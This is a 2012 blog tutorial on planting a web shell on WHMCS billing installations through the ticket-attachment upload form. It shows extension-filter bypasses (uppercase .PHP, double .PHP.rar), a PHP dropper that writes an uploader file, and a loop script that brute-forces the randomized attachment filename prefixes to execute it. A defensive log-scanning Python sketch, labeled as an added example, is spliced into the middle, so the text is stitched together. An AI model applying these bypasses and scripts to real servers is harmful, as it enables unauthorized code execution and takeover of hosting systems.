Tuesday, October 23, 2012

WHMCS Trick with Mime Type And PHP Ext ByPass

Hi everyone..
It's been a while since I made a post; I've been busy on Facebook.
OK, this time I'm sharing one more way into WHMCS, although this trick is fairly old by now:
using the upload form on the submitticket page of a WHMCS installation.

Method 1: The PHP extension is allowed to be uploaded
Suppose our target is http://www.caridigoogle.com/whmcs/submitticket.php
We can see an upload form like this:
[Image: WOR61514.png]
If we upload a file with the .php extension, the result looks like this:
[Image: AKQ64896.png]
To bypass this, it is enough to change the file extension slightly, using capital letters.
For example, our file b0x.php is simply changed to b0x.PHP via Tamper Data.
[Image: oDZ62191.png]
Now submit.
[Image: wh162273.png]

Method 2: The PHP extension is not allowed to be uploaded on WHMCS
Look at this:
[Image: WOR61514.png]
There we can see that files with the .rar extension can be uploaded.
Still using Tamper Data, we append .rar to the file extension.
[Image: tSi62460.png]
b0x.PHP.rar has been uploaded.
[Image: hlj62514.png]
In WHMCS, the file is automatically renamed like this:

Quote: number_filename.extension
For example, our file b0x.PHP becomes:
Quote: RandomNumber_b0x.PHP
But here we cannot know RandomNumber, because it is a random number.

To obtain RandomNumber, let's take a look.
Let's make a small summary.
This code must be the attached file:
Code:
<?php
$shellcode = "[base64-encoded uploader payload removed]";
$b0x = fopen("sec4ever.php","w");
fwrite($b0x,base64_decode($shellcode));
?>

This uploader script will be created in the same folder (attachments).
Now upload it as before, via .PHP or a non-defined extension.
After that, use this code to generate and browse the site URLs and get the uploader in sec4ever.php:
Code:
<?
error_reporting(0);
$url = "http://domain.tld/whmcs/";
$attachfolder = "attachments";
$attach= "b0x.PHP";
for($b0x=100000; $b0x<1000000;$b0x++){
$urls = "$url/$attachfolder/$b0x"; $urls.="_$attach";
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($ch, CURLOPT_URL, $urls );
$result = @curl_exec($ch);
@curl_close($ch);
}
?>
Edit the variables to get the correct result - 3xPecteD
When the script finishes browsing the URLs auto-generated by the for loop,
it will have requested your PHP code, but you will not be able to know what the number is.
However, the script will have generated the shell/uploader in sec4ever.php.
[Image: q8O63187.png]
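Both behaviours described above leave traces a defender can look for: attachment names whose extension only passes a case-sensitive or last-segment check, and one client walking the six-digit prefix of attachments/<number>_<name>. The following detection sketch is an added example, not part of the original post; the extension list, the access-log layout, the threshold and the sample lines are assumptions.

```python
import re
from collections import defaultdict

# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Access-log request for attachments/<6 digits>_<name>, the naming scheme described in the post.
REQ = re.compile(
    r'^(\S+) .*?"(?:GET|HEAD|POST) \S*/attachments/(\d{6})_(\S+) HTTP/[\d.]+" (\d{3})'
)

def has_exec_ext(filename):
    """True if ANY extension segment is executable, ignoring case (b0x.PHP, b0x.PHP.rar)."""
    return any(seg.lower() in EXEC_EXTS for seg in filename.split(".")[1:])

def scan(log_lines, threshold=5):
    """Return (enumerators, hits).

    enumerators: client -> number of distinct numeric prefixes tried on executable names
    hits: (client, stored_name) for requests that returned 200 on an executable name
    """
    prefixes = defaultdict(set)
    hits = []
    for line in log_lines:
        m = REQ.match(line)
        if not m:
            continue
        ip, prefix, name, status = m.groups()
        if not has_exec_ext(name):
            continue  # ordinary attachment download
        prefixes[ip].add(prefix)
        if status == "200":
            hits.append((ip, f"{prefix}_{name}"))
    enumerators = {ip: len(p) for ip, p in prefixes.items() if len(p) >= threshold}
    return enumerators, hits

# Constructed sample log: one client walks prefixes, another fetches a normal archive.
SAMPLE = [
    f'203.0.113.7 - - [23/Oct/2012:10:00:0{i} +0000] '
    f'"GET /whmcs/attachments/10000{i}_b0x.PHP HTTP/1.1" 404 0'
    for i in range(6)
] + [
    '203.0.113.7 - - [23/Oct/2012:10:05:00 +0000] "GET /whmcs/attachments/483920_b0x.PHP HTTP/1.1" 200 0',
    '198.51.100.4 - - [23/Oct/2012:10:06:00 +0000] "GET /whmcs/attachments/555123_logs.rar HTTP/1.1" 200 912',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The same `has_exec_ext` check can be run over the names already stored in the attachments folder. Any 200 response in `hits` means a script-typed attachment was served from a web-reachable directory.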
That's the tutorial I have for today..
Hope it's useful.

credit : ./b0x